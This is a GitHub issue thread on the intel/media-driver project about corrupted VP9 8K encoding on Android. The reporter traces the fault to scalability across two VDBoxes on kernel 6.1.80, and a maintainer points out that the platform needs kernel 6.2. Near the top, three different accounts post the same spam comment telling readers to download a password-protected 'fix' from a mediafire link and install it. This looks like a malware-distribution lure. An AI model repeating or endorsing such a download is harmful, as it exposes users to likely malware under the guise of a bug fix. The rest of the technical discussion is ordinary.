intel/media-driver #1847: [Bug]: Got incorrect bitstream in encoding VP9 8K

Shao-Feng, 2024-08-27:
### Which component impacted?

Encode

### Is it regression? Good in old configuration?

No, this issue exist a long time

### What happened?

On Android, 
with media-driver intel-media-24.1.5, and intel-gmmlib-22.3.18

Running oneVPL example "hello-encode" with the change https://github.com/projectceladon/libvpl/pull/16
for encoding VP9 7680x4320 video. The bitstream is incorrect.
The input is generated with ffmpeg cmd below

ffmpeg -v verbose  -f lavfi -i testsrc=size=7680x4320:rate=1 -pix_fmt yuv420p -vframes 5 -y test.yuv 

On Ubuntu with the media-driver and gmmlib, this issue can not be reproduced.

The Codec dump on Android and Ubuntu is below
[T1829561088_ubuntu_8k.zip](https://github.com/user-attachments/files/16757856/T1829561088_ubuntu_8k.zip)
[T1389417720_android_8K.zip](https://github.com/user-attachments/files/16757857/T1389417720_android_8K.zip)

### What's the usage scenario when you are seeing the problem?

Video Conference

### What impacted?

Fail to encode VP9 video in 8K.
No problem to encode VP9 video in 4K
and no problem to encode H264 and H265 video

### Do you want to contribute a patch to fix the issue?

None

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

Shao-Feng, 2024-08-27:
[T2638025976_Android.zip](https://github.com/user-attachments/files/16758412/T2638025976_Android.zip)
[T2259550976_Ubuntu.zip](https://github.com/user-attachments/files/16758414/T2259550976_Ubuntu.zip)

Shao-Feng, 2024-08-28:
After disable scalability as below, this issue is not reproduced.

diff --git a/media_driver/agnostic/common/codec/hal/codechal_hw.h b/media_driver/agnostic/common/codec/hal/codechal_hw.h
index 6d3c07ac7..590e830be 100644
--- a/media_driver/agnostic/common/codec/hal/codechal_hw.h
+++ b/media_driver/agnostic/common/codec/hal/codechal_hw.h
@@ -1634,7 +1634,8 @@ public:
     //!
     bool IsDisableScalability()
     {
-        return m_disableScalability;
+       return true;
+        //return m_disableScalability;
     }

This issue is caused by enabling scalability for 8K VP9 encoding.

leyu-yao, 2024-08-28:
@Shao-Feng  May I know which platform you are working on?

Shao-Feng, 2024-08-28:
On RPL, Gen12

Shao-Feng, 2024-09-02:
This issue only can be reproduced with kernel 6.1.80.
On Ubuntu with kernel 6.5.0-45, this issue is not reproduced.
When this issue happen, scalability is enabled, and number of VDBox is 2.
 with kernel 6.1.80, the second VDBox did not work as expected, and the right half part of the bitstream shown on ViCue is incorrect, I suppose the right half part are encoded by the second VDBox.
With kernel 6.5.0-45, the right half part are encoded correcly as the left half

bai-isaac, 2024-09-02:
thanks shao feng for experiment!
Have one more question, for good result with kernel 6.5.0-45, scalability is disabled or enabled?

Shao-Feng, 2024-09-02:
> thanks shao feng for experiment! Have one more question, for good result with kernel 6.5.0-45, scalability is disabled or enabled?

Enabled and run encoding with 2 VDBox

intel-mediadev, 2024-09-02:
Auto Created VSMGWL-75955 for further analysis.

Jexu, 2024-09-09:
Pls check the release note, RPL starts fron kernel 6.2.

_ADL-N/RPL-S/RPL-P: starting from kernel 6.2_

Shao-Feng, 2024-09-09:
Thanks for checking it. Probably this issue is caused by the GuC of SRIOV VF. Close this one. I will check on local

closed 2024-09-09 by Shao-Feng